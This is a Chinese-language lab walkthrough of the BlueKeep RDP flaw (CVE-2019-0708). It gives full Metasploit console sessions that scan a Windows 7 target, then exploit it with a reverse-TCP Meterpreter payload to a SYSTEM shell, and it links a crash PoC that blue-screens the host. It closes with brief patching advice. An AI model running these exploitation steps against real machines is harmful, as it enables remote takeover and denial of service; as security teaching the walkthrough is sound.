2. 程式人生 > 其它 >CVE-2019-0708漏洞檢測利用

CVE-2019-0708漏洞檢測利用

阿新 發佈:2022-12-12

漏洞詳情

Windows系列伺服器於2019年5月15號,被爆出高危漏洞,該漏洞影響範圍較廣,漏洞利用方式是通過遠端桌面埠3389,RDP協議進行攻擊的。這個漏洞是今年來說危害嚴重性最大的漏洞,跟之前的勒索,永恆之藍病毒差不多。

漏洞影響版本

  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for Itanium-Based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows XP SP3 x86
  • Windows XP Professional x64 Edition SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 x64 Edition SP2
  • Windows 8和Windows 10及之後版本的使用者不受此漏洞影響

工具指令碼分享

連結:https://pan.baidu.com/s/1iGZcW1OxmrYvdJEBdjlSgA?pwd=e3hr
提取碼:e3hr

漏洞復現

1、復現環境

攻擊機kali:192.168.80.128

靶機windwos7:192.168.80.129

2、windwos7開啟遠端桌面

 點選允許遠端訪問。

 3、在kali中啟動msf,使用cve-2019-0708漏洞的掃描模板對靶機進行掃描。

msf6 > search 0708

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   2  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   3  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer

msf6 > use 0
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.80.129
rhosts => 192.168.80.129
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[+] 192.168.80.129:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

從掃描結果可以看到靶機存在該漏洞。

4、使用msf反彈shell

反彈shell的前提:靶機和攻擊機互通。

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > search 0708

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   2  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   3  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use 1
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.80.129
rhosts => 192.168.80.129
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.80.128
lhost => 192.168.80.128
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444
lport => 4444
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
   8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.80.128:4444
[*] 192.168.80.129:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.80.129:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.80.129:3389   - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.80.129:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[!] 192.168.80.129:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.80.129:3389 - Surfing channels ...
[*] 192.168.80.129:3389 - Lobbing eggs ...
[*] 192.168.80.129:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.80.129:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200774 bytes) to 192.168.80.129
[*] Meterpreter session 1 opened (192.168.80.128:4444 -> 192.168.80.129:49159) at 2022-12-12 15:16:09 +0800

meterpreter > shell
Process 2580 created.
Channel 1 created.
Microsoft Windows [▒汾 6.1.7601]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

其中設定target需要根據靶機的屬性來原則,0代表自動根據指紋自動判斷情況(不太好用),1代表真實機器,2代表目標系統在virtualbox虛擬機器下執行,3、4、5代表代表目標系統在virtualbox虛擬機器下執行,6代表目標系統在Hyper-V虛擬機器下執行。如果用目標型號的targets利用不成功的話,就換其他的targets試一下(簡單來說就是多試試就行了)

注:攻擊 Windows 7 SP1 x64 與 Windows 2008 R2 x64的EXP不太穩定,針對 Windows 7 SP1 x64攻擊有藍屏現象。

批量檢測指令碼

windows下的python環境:

  1. 編輯3389_hosts,將待檢測的IP地址寫入檔案,一行一個
  2. 命令列切換到程式碼所在的目錄,執行python3 cve-2019-0708.py

 藍屏

使用漏洞POC進行測試: POC:https://github.com/n1xbyte/CVE-2019-0708 用法:python3 crashpoc.py ip地址 系統型別

 靶機已藍屏。

 漏洞修復

及時打對應系統的安全補丁
關閉3389埠或新增防火牆安全策略限制對3389埠的訪問

參考

https://cloud.tencent.com/developer/article/2069868

 

相關推薦

CVE-2019-0708漏洞檢測利用

漏洞詳情 Windows系列伺服器於2019年5月15號,被爆出高危漏洞,該漏洞影響範圍較廣,漏洞利用方式是通過遠端桌面埠3389,RDP協議進行攻擊的。這個漏洞是今年來說危害嚴重性最大的漏洞,跟之前的勒索,永恆之藍病毒差

CVE-2019-0708: Windows RDP遠端漏洞無損檢測工具下載

CVE-2019-0708: Windows RDP遠端漏洞無損檢測工具下載 0x00下載連結 https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip

CVE-2019-0193漏洞復現

一、漏洞描述 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫和

CVE-2019-0708復現 靶機藍屏 無法反彈shell

轉自: https://www.haochen1204.com/index.php/archives/90/ CVE-2019-0708漏洞復現(shell與藍屏)

CVE-2019-13272 核心漏洞提權手記

poc: github kernel-bug-summary: blog 中文簡述:嘶吼 CVE: CVE-2019-13272 要點 簡單總結:即利用併發條件下,子程式在獲取父程式的同時,父程式的憑證得以切換至root來使得子程式同時獲得root許可權。

Docker逃逸--runc容器逃逸漏洞(CVE-2019-5736)

漏洞詳情: Docker、containerd或者其他基於runc的容器執行時存在安全漏洞,攻擊者可以通過特定的容器映象或者exec操作可以獲取到宿主機的runc執行時的檔案控制代碼並修改掉runc的二進位制檔案,從而獲取到宿主機的r

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

CVE-2019-0230 s2-059 漏洞分析

0x01 問題原因 Apache Struts 框架在強制時對分配給某些標記屬性的屬性值執行雙重計算,以便可以傳遞一個值,該值將在呈現標記的屬性時再次計算。對於精心設計的請求,這可能會導致遠端程式碼執行 (RCE)。

weblogic XMLDecoder反序列化 CVE-2017-10271 工具檢測+工具利用復現

被360眾測靶場殘虐,所以決定把這些常規漏洞(Vulhub)都學一下他們的利用

Apache Dubbo反序列化漏洞CVE-2019-17564)復現分析

漏洞描述 Apache Dubbo是一款高效能Java RPC框架,核心功能是方便麵向介面的遠端過程呼叫,叢集容錯和負載均衡,以及服務自動註冊與發現。

Docker環境復現利用Redis未授權訪問漏洞 >> 批量掃描檢測利用

關於Redis Redis(Remote Dictionary Server ),即遠端字典服務,是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。從2010年3月15日起,Redis的

2020 weblogin rce CVE-2020-14882 漏洞利用POC

漏洞來源 根據P牛圈子告知,應該是長亭某研究員上報“voidfyoo”。 細節由國外人員披露

vulhub漏洞復現-Django JSONField SQL注入漏洞復現 (CVE-2019-14234)

Django JSONField SQL注入漏洞復現 (CVE-2019-14234) 漏洞概述: Django通常搭配postgresql資料庫,而JSONField是該資料庫的一種資料型別。該漏洞的出現的原因在於Django中JSONField類的實現,Django的mode

j link linux核心_Linux本地核心提權漏洞(CVE-2019-13272)

技術標籤:j link linux核心 0x00 簡介 2019年07月20日,Linux正式修復了一個本地核心提權漏洞。通過此漏洞,攻擊者可將普通許可權使用者提升為Root許可權。

分析jackjson的安全漏洞CVE-2019-14379

Jackson 是當前用的比較廣泛的,用來序列化和反序列化 json 的 java 的開源框架。Jackson 社 區相對比較活躍,更新速度也比較快, 從 github 中的統計來看,Jackson 是最流行的 json 解析器之一 。今天給大家介紹jac

Apache Solr 遠端命令執行漏洞復現(CVE-2019-0193)

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Django JSONField/HStoreField SQL 注入漏洞 (CVE-2019-14234)

一.漏洞描述 該漏洞需要開發者使用了JSONField/HStoreField,且使用者可控queryset查詢時的鍵名,在鍵名的位置注入SQL語句。

docker逃逸漏洞復現(CVE-2019-5736)

漏洞概述 2019年2月11日,runC的維護團隊報告了一個新發現的漏洞,SUSE Linux GmbH高階軟體工程師Aleksa Sarai公佈了影響Docker, containerd, Podman, CRI-O等預設執行時容器runc的嚴重漏洞CVE-2019-5736。漏洞會對

Drupal漏洞復現:CVE-2019-6341

近期遇到Drupal漏洞,研究了一下,給大家分享一篇復現,望共鳴 前言: Vulhub是一個基於docker和docker-compose的漏洞環境集合,進入對應目錄並執行一條語句即可啟動一個全新的漏洞環境,讓漏洞復現變得更加簡單,讓

CVE 2017-0199漏洞利用的新姿勢

近日從客戶處捕獲一枚郵件附件中的可疑word樣本,以下是掃描結果,檢測率貌似不高。